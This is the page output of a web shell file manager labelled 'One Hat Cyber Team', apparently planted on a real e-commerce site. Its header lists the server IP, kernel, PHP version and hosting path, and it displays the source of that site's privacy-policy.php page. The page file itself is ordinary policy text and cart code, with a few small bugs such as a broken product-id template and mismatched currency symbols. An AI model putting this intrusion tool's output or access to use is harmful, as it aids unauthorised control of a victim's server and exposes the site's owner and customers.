One Hat Cyber Team
Your IP :
216.73.216.186
Server IP :
93.127.173.44
Server :
Linux in-mum-web1837.main-hosting.eu 5.14.0-503.34.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Mar 27 06:00:50 EDT 2025 x86_64
Server Software :
LiteSpeed
PHP Version :
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
u322583024
/
domains
/
awaha.in
/
public_html
/
View File Name :
privacy-policy.php
<?php session_name('vaishnavi_awaha'); session_start(); include 'admin/connection.inc.php'; ?> <!DOCTYPE html> <html lang="zxx"> <head> <!--====== Required meta tags ======--> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="description" content="eCommerce,shop,fashion"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <!--====== Title ======--> <title>Awaha</title> <!--====== Favicon Icon ======--> <link rel="shortcut icon" href="assets/images/logo/awaha.png" type="image/png"> <!--====== Google Fonts ======--> <link href="https://fonts.googleapis.com/css2?family=Aoboshi+One&family=DM+Sans:ital,opsz,wght@0,9..40,100..1000;1,9..40,100..1000&display=swap" rel="stylesheet"> <!--====== Flaticon css ======--> <link rel="stylesheet" href="assets/fonts/flaticon/flaticon_pesco.css"> <!--====== FontAwesome css ======--> <link rel="stylesheet" href="assets/fonts/fontawesome/css/all.min.css"> <!--====== Bootstrap css ======--> <link rel="stylesheet" href="assets/vendor/bootstrap/css/bootstrap.min.css"> <!--====== Slick-popup css ======--> <link rel="stylesheet" href="assets/vendor/slick/slick.css"> <!--====== Nice Select css ======--> <link rel="stylesheet" href="assets/vendor/nice-select/css/nice-select.css"> <!--====== Magnific-popup css ======--> <link rel="stylesheet" href="assets/vendor/magnific-popup/dist/magnific-popup.css"> <!--====== Jquery UI css ======--> <link rel="stylesheet" href="assets/vendor/jquery-ui/jquery-ui.min.css"> <!--====== Animate css ======--> <link rel="stylesheet" href="assets/vendor/aos/aos.css"> <!--====== Default css ======--> <link rel="stylesheet" href="assets/css/default.css"> <!--====== Style css ======--> <link rel="stylesheet" href="assets/css/style.css"> <style> .wishlist-container { max-width: 900px; margin: 50px auto; } .wishlist-item { display: flex; align-items: center; padding: 15px; border-bottom: 1px solid #ddd; background: #fff; border-radius: 10px; margin-bottom: 15px; } .wishlist-item img { width: 100px; height: 100px; object-fit: cover; border-radius: 10px; } .wishlist-item-details { flex: 1; margin-left: 15px; } .wishlist-item h5 { margin: 0; font-size: 18px; } .wishlist-item p { margin: 5px 0; color: #777; } .remove-btn { background: red; color: white; border: none; padding: 5px 10px; border-radius: 5px; cursor: pointer; } /* Container for the Order List */ .order-header { background-color: #f7f7f7; padding: 15px; margin-bottom: 20px; border-radius: 8px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); } .order-header h3 { font-size: 24px; font-weight: 700; color: #333; margin-bottom: 10px; text-transform: uppercase; } .order-header p { font-size: 16px; color: #555; margin: 5px 0; } /* Styling the Order Items Container */ .order-items { display: flex; flex-wrap: wrap; gap: 20px; } .order-item { display: flex; background-color: #fff; padding: 15px; border-radius: 8px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); width: calc(33% - 20px); /* 3 items per row */ transition: transform 0.3s ease, box-shadow 0.3s ease; } .order-item:hover { transform: translateY(-5px); box-shadow: 0 8px 16px rgba(0, 0, 0, 0.2); } /* Product Image */ .order-item img { width: 100px; height: 100px; object-fit: cover; border-radius: 8px; border: 2px solid #e0e0e0; } /* Order Item Details */ .order-item-details { margin-left: 15px; flex-grow: 1; } /* Product Name */ .order-item-details h5 { font-size: 18px; font-weight: 600; color: #333; margin: 0; transition: color 0.3s ease; } .order-item-details h5:hover { color: #007bff; } /* Price and Additional Info */ .order-item-details p { font-size: 14px; color: #555; margin: 5px 0; } .order-item-details p:nth-child(3) { font-weight: 500; color: #28a745; /* Green color for status */ } .order-item-details p:nth-child(4) { font-weight: 500; color: #dc3545; /* Red color for status */ } /* Styling for Empty Message */ .text-center { font-size: 18px; color: #888; text-align: center; margin-top: 30px; } /* Responsive Design */ @media (max-width: 1024px) { .order-item { width: calc(50% - 20px); /* 2 items per row on medium screens */ } } @media (max-width: 768px) { .order-item { width: 100%; /* 1 item per row on small screens */ flex-direction: column; align-items: center; } .order-item img { margin-bottom: 15px; } .order-item-details { margin-left: 0; text-align: center; } .order-item-details h5 { font-size: 16px; } .order-item-details p { font-size: 14px; } } .privacy-container { max-width: 1200px; margin: auto; background: #fff; padding: 30px; border-radius: 12px; box-shadow: 0 8px 20px rgba(0, 0, 0, 0.1); transition: transform 0.3s ease-in-out; } .privacy-container:hover { transform: scale(1.02); } /* Title and Date */ .privacy-title { text-align: center; font-size: 28px; font-weight: 700; color: #2c3e50; margin-bottom: 5px; } .privacy-date { font-size: 15px; text-align: center; color: #888; margin-bottom: 20px; } /* Sections */ /* Headings */ .privacy-heading { font-size: 22px; font-weight: 600; margin-bottom: 10px; } /* Paragraphs */ .privacy-text { font-size: 16px; color: #555; } /* List Items */ .privacy-list { margin-left: 20px; font-size: 16px; color: #444; } .privacy-list li { margin-bottom: 8px; padding-left: 10px; position: relative; } /* Adding Custom Icons for List */ .privacy-list li::before { content: "✔"; font-size: 16px; font-weight: bold; position: absolute; left: -20px; } /* Contact Section */ .privacy-contact { background: #d7b1bb; color: #fff; padding: 20px; border-radius: 8px; text-align: center; margin-top: 30px; } .privacy-contact p { margin: 5px 0; } .privacy-contact strong { color: #6e8ec1; } /* Responsive Design */ @media (max-width: 768px) { .privacy-container { padding: 20px; } .privacy-heading { font-size: 20px; } .privacy-text { font-size: 15px; } } </style> </head> <body> <!--====== Start Overlay ======--> <div class="offcanvas__overlay"></div> <!--====== Start Sidemenu-wrapper-cart Area ======--> <div class="sidemenu-wrapper-cart"> <div class="sidemenu-content"> <div class="widget widget-shopping-cart"> <h4>My cart</h4> <div class="sidemenu-cart-close"><i class="far fa-times"></i></div> <div class="widget-shopping-cart-content"> <ul class="pesco-mini-cart-list" id="cart-items-list"> <!-- Cart items will be dynamically loaded here --> </ul> <div class="cart-mini-total"> <div class="cart-total"> <span><strong>Subtotal:</strong></span> <span class="amount" id="cart-subtotal">0.00</span> </div> </div> <div class="cart-button-box"> <a href="checkout.php" class="theme-btn style-one">Proceed to checkout</a> </div> </div> </div> </div> </div><!--====== End Sidemenu-wrapper-cart Area ======--> <!--====== Start Header Section ======--> <?php include 'header.php' ?> <!--====== End Header Section ======--> <!--====== Main Bg ======--> <main class="main-bg"> <!--====== Start Page Banner Section ======--> <section class="page-banner"> <div class="page-banner-wrapper p-r z-1"> <svg class="lineanm" viewBox="0 0 1920 347" fill="none" xmlns="http://www.w3.org/2000/svg"> <path class="line" d="M-39 345.187C70 308.353 397.628 293.477 436 145.186C490 -63.5 572 -57.8156 688 255.186C757.071 441.559 989.5 -121.315 1389 98.6856C1708.6 274.686 1940.33 156.519 1964.5 98.6856" stroke="white" stroke-width="3" stroke-dasharray="2 2"/> </svg> <div class="page-image"><img src="assets/images/soap/bgrsoap.png" alt="image"></div> <svg class="page-svg" xmlns="http://www.w3.org/2000/svg"> <path d="M21.1742 33.0065C14.029 35.2507 7.5486 39.0636 0 40.7339V86H1937V64.9942C1933.1 60.1623 1912.65 65.1777 1904.51 62.6581C1894.22 59.4678 1884.93 55.0079 1873.77 52.7742C1861.2 50.2585 1823.41 36.3854 1811.99 39.9252C1805.05 42.0727 1796.94 37.6189 1789.36 36.6007C1769.18 33.8879 1747.19 31.1848 1726.71 29.7718C1703.81 28.1919 1678.28 27.0012 1657.53 34.4442C1636.45 42.005 1606.07 60.856 1579.5 55.9191C1561.6 52.5906 1543.41 47.0959 1528.45 56.9075C1510.85 68.4592 1485.74 74.2518 1460.44 76.136C1432.32 78.2297 1408.53 70.6879 1384.73 62.2987C1339.52 46.361 1298.19 27.1677 1255.08 9.28534C1242.58 4.10111 1214.68 15.4762 1200.55 16.6533C1189.77 17.5509 1181.74 15.4508 1172.12 12.8795C1152.74 7.70033 1133.23 2.88525 1111.79 2.63621C1088.85 2.36971 1073.94 7.88289 1056.53 15.8446C1040.01 23.3996 1027.48 26.1777 1007.8 26.1777C993.757 26.1777 975.854 25.6887 962.844 28.9632C941.935 34.2258 932.059 38.7874 914.839 28.6037C901.654 20.8061 866.261 -2.56499 844.356 7.12886C831.264 12.9222 820.932 21.5146 807.663 27.5255C798.74 31.5679 779.299 42.0561 766.33 39.1166C758.156 37.2637 751.815 31.6349 745.591 28.2443C730.967 20.2774 715.218 13.2948 695.846 10.723C676.168 8.11038 658.554 23.1787 641.606 27.4357C617.564 33.4742 602.283 27.7951 579.244 27.7951C568.142 27.7951 548.414 30.4002 541.681 23.6618C535.297 17.2722 530.162 9.74921 523.263 3.71444C517.855 -1.01577 505.798 -0.852017 498.318 2.09709C479.032 9.7007 453.07 10.0516 431.025 9.64475C407.556 9.21163 368.679 1.61612 346.618 10.3636C319.648 21.0575 291.717 53.8338 254.67 45.2266C236.134 40.9201 225.134 37.5813 204.78 40.7339C186.008 43.6415 171.665 50.7785 156.051 57.3567C146.567 61.3523 152.335 52.6281 151.12 47.9222C149.535 41.7853 139.994 34.5585 132.991 30.4008C120.206 22.8098 90.2848 24.3246 74.2546 24.6502C55.5552 25.0301 37.9201 27.747 21.1742 33.0065Z" fill="#FFFAF3"/> </svg> <div class="shape shape-one"><span></span></div> <div class="shape shape-two"><span></span></div> <div class="shape shape-three"><span><img src="assets/images/shape/curved-arrow.png" alt=""></span></div> <div class="container"> <div class="row"> <div class="col-lg-6"> <div class="page-banner-content"> <h1> Privacy Policy </h1> <ul class="breadcrumb-link"> <li><a href="index.php">Home</a></li> <li><i class="far fa-long-arrow-right"></i></li> <li class="active">Privacy Policy</li> </ul> </div> </div> </div> </div> </div> </section><!--====== End Page Banner Section ======--> <!--====== Start About Us Section ======--> <section class="about-us-section pt-20"> <div class="container"> <div class="row"> <div class="col-xl-12"> <!--====== Section Image Box ======--> <div class="privacy-container"> <h1 class="privacy-title">Privacy Policy</h1> <div class="privacy-section" style="font-family: Arial, sans-serif; font-size: 14px; line-height: 1.6; color: #333; padding: 20px; background-color: #f9f9f9; border: 1px solid #ddd; border-radius: 5px;"> <div class="privacy-section"> <h2 class="privacy-heading">1. Introduction</h2> <p class="privacy-text">Welcome to <strong>Awaha</strong>. We are committed to protecting your privacy. This Privacy Policy explains how we collect, use, and protect your personal information when you visit our website <strong>[https://awaha.in/]</strong> and purchase our products.</p> </div> <div class="privacy-section"> <h2 class="privacy-heading">2. Information We Collect</h2> <ul class="privacy-list"> <li><strong>Personal Information:</strong> Name, email, phone number, shipping/billing address.</li> <li><strong>Payment Information:</strong> We do not store your payment details. Payments are processed securely via <strong>Razorpay</strong>.</li> <li><strong>Usage Data:</strong> IP address, browser type, and interaction with our website for analytics.</li> </ul> </div> <div class="privacy-section"> <h2 class="privacy-heading">3. How We Use Your Information</h2> <ul class="privacy-list"> <li>To process and fulfill your orders.</li> <li>To send order updates, promotions, and notifications.</li> <li>To enhance your shopping experience.</li> <li>To prevent fraud and ensure secure transactions.</li> </ul> </div> <div class="privacy-section"> <h2 class="privacy-heading">4. Payment Processing</h2> <p class="privacy-text">All payments are securely processed via <strong>Razorpay</strong>. We do not store or handle your payment details. Razorpay complies with PCI-DSS security standards.</p> </div> <div class="privacy-section"> <h2 class="privacy-heading">5. Data Protection and Security</h2> <p class="privacy-text">We use industry-standard security measures to protect your personal information from unauthorized access, disclosure, or misuse.</p> </div> <div class="privacy-section"> <h2 class="privacy-heading">6. Sharing of Information</h2> <p class="privacy-text">We do not sell or rent your data. However, we may share information with:</p> <ul class="privacy-list"> <li>Service providers (e.g., shipping partners, payment gateways) to fulfill your orders.</li> <li>Legal authorities, if required by law.</li> </ul> </div> <div class="privacy-section"> <h2 class="privacy-heading">7. Cookies and Tracking</h2> <p class="privacy-text">We use cookies to improve website functionality and user experience. You can manage cookie settings through your browser.</p> </div> <div class="privacy-section"> <h2 class="privacy-heading">8. Your Rights</h2> <p class="privacy-text">You have the right to:</p> <ul class="privacy-list"> <li>Access, update, or delete your personal information.</li> <li>Opt-out of marketing emails.</li> <li>Request details of data we store about you.</li> </ul> </div> <div class="privacy-section"> <h2 class="privacy-heading">9. Third-Party Links</h2> <p class="privacy-text">Our website may contain links to third-party sites. We are not responsible for their privacy practices.</p> </div> <div class="privacy-section"> <h2 class="privacy-heading">10. Changes to This Policy</h2> <p class="privacy-text">We may update this policy from time to time. Any changes will be posted on this page with an updated effective date.</p> </div> </div> </div> </section><!--====== End About Us Section ======--> <!--====== Start Features Section ======--> </main> <!--====== Start Footer Main ======--> <?php include 'footer.php' ?> <script> function removeFromWishlist(productId) { fetch('remove-wishlist.php', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'product_id=' + productId }) .then(response => response.json()) .then(data => { if (data.success) { location.reload(); // Refresh the page after removal } else { alert(data.message); } }); } </script> <script> document.addEventListener('DOMContentLoaded', () => { const cartContainer = document.querySelector('#cart-items-list'); const cartSubtotal = document.querySelector('#cart-subtotal'); // Fetch cart items from server or localStorage fetch('fetch-cart-items.php') .then(response => response.json()) .then(data => { if (data.success) { let itemsHTML = ''; let subtotal = 0; data.cart_items.forEach(item => { const { product_id, product_name, product_price, product_img, quantity } = item; // Create a cart item list entry itemsHTML += ` <li class="sidebar-cart-item" data-product-id="₹{product_id}"> <a href="#" class="remove-cart" data-product-id="${product_id}"> <i class="far fa-trash-alt"></i> </a> <a href="#"> <img src="awaha/${product_img}" alt="${product_name}"> ${product_name} </a> <span class="quantity">${quantity} × <span><span class="currency">₹</span>${product_price}</span></span> </li> `; // Calculate the subtotal subtotal += product_price * quantity; }); // Update cart UI with new cart items cartContainer.innerHTML = itemsHTML; cartSubtotal.innerHTML = `<span class="currency">₹</span>${subtotal.toFixed(2)}`; } else { cartContainer.innerHTML = '<li>No items in the cart</li>'; } }) .catch(error => { console.error('Error fetching cart items:', error); cartContainer.innerHTML = '<li>Error loading cart items</li>'; }); // Event delegation for removing items cartContainer.addEventListener('click', (event) => { if (event.target.closest('.remove-cart')) { event.preventDefault(); const cartItem = event.target.closest('.sidebar-cart-item'); const productId = cartItem.getAttribute('data-product-id'); // Call an endpoint to remove the item from the cart fetch('remove-cart-item.php', { method: 'POST', headers: { 'Content-Type': 'application/json', }, body: JSON.stringify({ product_id: productId }), }) .then(response => response.json()) .then(data => { if (data.success) { cartItem.remove(); // Remove item from the UI updateSubtotal(); } else { console.error(data.message); } }) .catch(error => console.error('Error removing item:', error)); } }); // Function to update subtotal function updateSubtotal() { let total = 0; const cartItems = document.querySelectorAll('.sidebar-cart-item'); cartItems.forEach(item => { const quantity = parseInt(item.querySelector('.quantity').textContent.split(' × ')[0]); const price = parseFloat(item.querySelector('.quantity span span.currency').nextElementSibling.textContent); total += quantity * price; }); cartSubtotal.innerHTML = `<span class="currency">$</span>${total.toFixed(2)}`; } }); </script> <!--====== End Footer Main ======--> <!--====== Back To Top ======--> <div class="back-to-top" ><i class="far fa-angle-up"></i></div> <!--====== Jquery js ======--> <script src="assets/vendor/jquery-3.7.1.min.js"></script> <!--====== Bootstrap js ======--> <script src="assets/vendor/popper/popper.min.js"></script> <!--====== Bootstrap js ======--> <script src="assets/vendor/bootstrap/js/bootstrap.min.js"></script> <!--====== Slick js ======--> <script src="assets/vendor/slick/slick.min.js"></script> <!--====== Magnific js ======--> <script src="assets/vendor/magnific-popup/dist/jquery.magnific-popup.min.js"></script> <!--====== Nice-select js ======--> <script src="assets/vendor/nice-select/js/jquery.nice-select.min.js"></script> <!--====== Jquery Ui js ======--> <script src="assets/vendor/jquery-ui/jquery-ui.min.js"></script> <!--====== SimplyCountdown js ======--> <script src="assets/vendor/simplyCountdown.min.js"></script> <!--====== Aos js ======--> <script src="assets/vendor/aos/aos.js"></script> <!--====== Main js ======--> <script src="assets/js/theme.js"></script> </body> </html>